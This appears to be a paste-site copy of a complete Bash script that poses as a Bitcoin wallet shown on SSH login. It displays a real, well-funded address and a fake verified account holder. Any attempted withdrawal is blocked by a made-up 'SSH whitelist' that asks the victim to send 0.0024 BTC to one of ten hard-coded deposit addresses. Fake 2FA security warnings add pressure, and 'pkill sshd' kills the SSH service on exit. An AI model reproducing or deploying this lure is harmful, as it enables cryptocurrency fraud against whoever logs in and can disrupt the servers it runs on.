
Fake BTC Wallet via ssh source

Jun 16th, 2023
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Bash 9.29 KB | Cybersecurity | 0 0
  1. #!/usr/bin/env bash
  2. #shellcheck disable=SC2086
  3. #https://github.com/rzgarespo/bashBtcWallet
  5. # Declare variables
  6. walletAddr="1GQdrgqAbkeEPUef1UpiTc4X1mUHMcyuGW"
  7. username=$(whoami)
  8. serverName=$(hostname)
  10. # Function for animating loading txt
  11. animate_dots() {
  12.   trap 'echo -e "\e[1m Exiting...\e[0m"; sleep 2; clear; pkill sshd; exit' INT
  13.   string=$1
  14.   iterations=$2
  15.   sleep_time=$3
  16.   for i in $(seq 1 $iterations); do
  17.     printf "\r$string"
  18.     for j in $(seq 1 $i); do
  19.         printf "."
  20.     done
  21.     sleep $sleep_time
  22.   done
  23.   clear
  24. }
  25. # Function to display warning message for 2FA
  26. warning2FA() {
  27.     echo
  28.     echo
  29.     echo -e "         \e[31m\e[1m Security alert:\e[0m"
  30.     echo " Two-factor authentication(2FA) for SSH connection"
  31.     echo " is not configured. To enable 2FA, Access your User"
  32.     echo " settings thtoughthe Phone or Desktop application, "
  33.     echo " Select Account, Select Enable 2FA for SSH"
  34.     echo
  35.     echo " ************************"
  36. }
  37. # Function to prompt user for confirmation
  38. ask(){
  39.   trap 'echo -e "\e[1mExiting...\e[0m"; sleep 2; clear;pkill sshd; exit' INT
  41.   while true; do
  42.     echo -e "\e[1m Do you want to continue? [y/n]:\e[0m"
  43.     read -r choice
  44.     case $choice in
  45.       INT)
  46.         echo " Exiting..."
  47.         exit
  48.         ;;
  49.           y|yes)
  50.               clear
  51.               userLogin
  52.               walletInfo
  53.               walletOption
  54.         ;;
  55.           n|no)
  56.               clear
  57.               echo
  58.               animate_dots "\e[1m Exiting \e[0m " 3 1
  59.               pkill sshd
  60.               exit 0
  61.               ;;
  62.       *)
  63.         echo echo $'Invalid choice. Type in  "yes" or "no" alternatively "y" or "n".'
  64.         ;;
  65.     esac
  66.   done
  67. }
  68. # Function to display user login details
  69. userLogin() {
  70.     echo
  71.     echo "************************"
  72.     echo "    $(date +%Y/%m/%d)"
  73.    echo -e "\e[1m Account holder:\e[0m  James Takahiro Teng \u2713 \e[2mverified\e[0m"
  74.     echo -e "\e[1m User ID:\e[0m 167659109"
  75.     echo -e "\e[1m User Name:\e[0m $username@$serverName"
  76.     echo
  77.     echo "************************"
  78. }
  79. # Function to get current price in USD
  80. btcJsonPrise() {
  81.       curl -s "https://api.coindesk.com/v1/bpi/currentprice.json" | jq -r '.bpi | .USD | .rate'
  82. }
  83. # Function to get final balance
  84. finalBalance() {
  86.   curl -s "https://blockchain.info/balance?active=$walletAddr" | jq '.[] | .final_balance'
  87. }
  88. # Function to get detailed information about the wallet
  89. btcWalletAlltime() {
  90.     jsonData=$(curl -s "https://blockchain.info/rawaddr/$walletAddr?limit=1")
  91.     received=$(echo $jsonData | jq -r '.total_received/100000000')
  92.     sent=$(echo $jsonData | jq -r '.total_sent/100000000')
  93.     balance=$(echo $jsonData | jq -r '.final_balance/100000000')
  94.     #echo "Total Received: $received"
  95.     #echo "$received $sent $balance"
  96.  }
  97. # Function to get transaction history and values for the wallet
  98. btcHistoryValue() {
  99.  #curl -s "https://blockchain.info/rawaddr/$walletAddr?limit=2" | jq '.txs[].out[] | .addr, .value/100000000'
  100.  curl -s "https://blockchain.info/rawaddr/$walletAddr?limit=3"  | jq --compact-output --raw-output 'range(0;3) as $i | .txs[$i].out[0].addr, .txs[$i].result/100000000'
  101. }
  102. # Function to print the header information
  103. walletInfo() {
  105.     echo
  106.     echo -e "\e[1m Main Wallet Address:\e[0m $walletAddr"
  107.     printf "\e[1m Final Balance(BTC):\e[0m %10f\n" "$(finalBalance /100000000)e-8"
  108.     echo -e "\e[1m Current Price(USD):\e[0m $(btcJsonPrise)"
  109.     echo "************************"
  110.     echo
  112. }
  113. # Function to generate QR code for the wallet address
  114. btcQRcode() {
  115.   qrencode -s 3 -m 2 -t UTF8 "$walletAddr"
  116. }
  117. # Function to check if an address is valid
  118. isValidAddress() {
  119.     local address=$1
  120.     local response
  121.     response=$(curl -s "https://blockchain.info/q/addressbalance/$address")
  122.     if [ "$response" -eq "$response" ] 2>/dev/null; then
  123.         echo
  124.         echo -e "\e[42m\e[30m\e[1m Address is valid.\e[0m"
  125.         echo
  126.         return 0
  127.     else
  128.         echo
  129.         echo -e "\e[41m\e[37m\e[01 Address is not valid \e[0m"
  130.         echo
  131.         return 1
  132.     fi
  133. }
  134. # Function to get a random deposit address
  135. getDepositAddress() {
  136.     # List of deposit addresses
  137.     local -a depositAddresses=("bc1q3507ruzwz60kqsh4w67asmxjcxu3yq7u74jxzq" "bc1q7qq268np4my4u0g2qcw2ys7fwjgywapxnef3a0" "bc1q47xq565yw9cdj2efhzgwee3msw0dzmcna56h6r" "bc1qvr657clyu9m54nmcgmrkkw9q5gpd62jet79kxz" "bc1qkh0ma30e6r6xht37agxvdcjvavqqzmafrwugtk" "bc1q6azj8lhzthj2r63plflwdrn9y550ky6eelsng5" "bc1qyl8myegfe2a6rs4yc5t5hsmr049nc95rzf3fqp" "bc1qnx6qn6l5f2fhcm90qku9egxxnk9h9v8tske4rd" "bc1q3arwdqfg28hjvmfc62zq3kdur8r63nh4telpy8" "bc1qyu306rt2fk9r6q9r6l9c4xzjwayenjqkv8zxhw")
  138.     local addressCount=${#depositAddresses[@]}
  139.     local randomIndex=$((RANDOM % addressCount))
  140.     local selectedAddress="${depositAddresses[$randomIndex]}"
  141.     echo
  142.     echo -e "\e[1m Displaying QR code\e[0m:"
  143.     echo
  144.     qrencode -s 3 -m 2 -t UTF8 "$selectedAddress"
  145.     echo
  146.     echo -e " \e[1m Trading wallet:\e[0m  $selectedAddress"
  148. }
  149. # Function for processing withdrawal
  150. withdrawalProcess() {
  151.    trap 'clear; echo " Canceled by user."; walletOption' INT
  152.    echo -e "\e[1m Enter the amount for withdrawal:\e[0m"
  153.    read -r withdrawAmount
  155.  if ! [[ $withdrawAmount =~ ^-?[0-9]*\.?[0-9]+$ ]]; then
  156.     echo "Please enter a valid number"
  157.     withdrawalProcess
  159.   else
  161.     # check if entered amount is available in total balance
  162.   if [[ $(echo "$(finalBalance) < $(echo "$withdrawAmount * 100000000" | bc -l)" | bc) -eq 1 ]]; then
  163.         echo
  164.         echo  -e "\e[1m\e[31m Insufficient funds. Please enter a smaller amount.\e[0m"
  165.         echo
  166.         withdrawalProcess
  167.     else
  168.         echo  -e "\e[1m Enter a BTC address for withdrawal:\e[0m"
  169.         echo
  170.         read -r withdrawAddr
  171.         # Check if the entered address is valid
  172.         if ! isValidAddress "$withdrawAddr"; then
  173.             echo  -e "\e[1m The entered BTC address is not valid.\e[0m"
  174.             echo " Please enter a valid BTC address."
  175.             withdrawalProcess
  176.             walletOption
  177.         # check if entered address is not the same as $walletAddr
  178.         elif [ "$withdrawAddr" = "$walletAddr" ]; then
  179.             echo  -e "\e[1m\e[31m The entered BTC address is the same as the current wallet address.\e[0m"
  180.             echo " Please enter a different BTC address."
  181.             walletOption
  182.         else
  183.             # Check if the entered address is on the whitelist
  184.             if ! isWhitelisted "$withdrawAddr"; then
  185.                 echo  -e  "\e[1m The entered BTC address is not on the SSH whitelist.\e[0m"
  186.                 echo " To whitelist this address, receiver has to send 0.0024 BTC to the deposit address."
  187.                 echo " Upon successful validation(3 network confirmation), 0.0018 BTC will be credited to"
  188.                 echo " whitelisted wallet."
  189.                 echo  -e  "\e[1m\e[31m Disable manual whitelist feature by activating 2FA for SSH connection.\e[0m"
  190.                 getDepositAddress
  191.             else
  192.                 echo "Withdrawing $withdrawAmount BTC to $withdrawAddr..."
  193.                 # Code to process withdrawal to the specified address
  194.             fi
  195.         fi
  196.     fi
  197.     fi
  198. }
  199. # Function to check if an address is on the whitelist
  200. isWhitelisted() {
  201.     # Whitelisted addresses
  202.     local -a whitelist=("1GQdrgqAbkeEPUef1UpiTc4X1mUHMcyuGW" "1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa")
  203.     for addr in "${whitelist[@]}"; do
  204.         if [ "$addr" == "$1" ]; then
  205.             return 0
  206.         fi
  207.     done
  208.     return 1
  209. }
  210. # Function to display wallet options
  211. walletOption() {
  213.     echo
  214.     echo
  215.     echo " 1) Deposite"
  216.     echo " 2) Withdrawal"
  217.     echo " 3) Transactions"
  218.     echo " 4) Exit"
  219.     echo
  220.     echo -e "\e[1m Select an option:\e[0m"
  222.     read -r whichOption
  224.     case "$whichOption" in
  226.     1 | Deposite | deposite)
  227.       clear
  228.       walletInfo
  229.       echo " Deposite BTC to the Trading wallet:"
  230.       echo
  231.       getDepositAddress
  233.       echo  -e " \e[1m Network:\e[0m Bitcoin | SegWit"
  234.       echo  -e " \e[1m Minimum deposit:\e[0m  0.00233937"
  235.       echo  -e " \e[1m Expected arrival:\e[0m 3 network confirmation"
  236.       echo  -e "\e[31m if you deposit via another network your asset may be lost.\e[0m"
  237.       echo
  238.       echo "************************"
  239.       walletOption
  240.       ;;
  242.     2 | Withdrawal | withdrawal)
  243.       clear
  244.       walletInfo
  245.       echo -n "Withdrawal"
  246.       echo
  248.       withdrawalProcess
  250.       echo "************************"
  251.       walletOption
  252.       ;;
  254.     3 | Transactions | transactions)
  255.       clear
  256.       walletInfo
  257.       echo " Alltime Activity"
  258.       echo
  259.       btcWalletAlltime
  260.       echo -e "\e[1m Total Received:\e[0m $received"
  261.       echo -e "\e[1m Total Sent:\e[0m $sent"
  262.       #echo -e "\e[1m Final Balance:\e[0m $balance"
  263.       echo "************************"
  264.       echo
  265.       echo " Last Transactions | Amounts:"
  266.       echo
  267.       #btcHistory
  268.       btcHistoryValue
  269.       echo
  270.       echo "************************"
  271.       walletOption
  272.       ;;
  275.     4 | Exit | exit | x)
  276.       clear
  277.       animate_dots "\e[1m Exiting \e[0m " 3 1
  278.     pkill sshd
  279.       exit 0
  280.       ;;
  282.     *)
  283.     clear
  284.     echo
  285.     echo " Invalid option. Please try again."
  286.       walletOption
  287.       ;;
  288.   esac
  290. }
  291. echo
  292. animate_dots "loading the wallet " 3 1
  293. warning2FA
  294. ask
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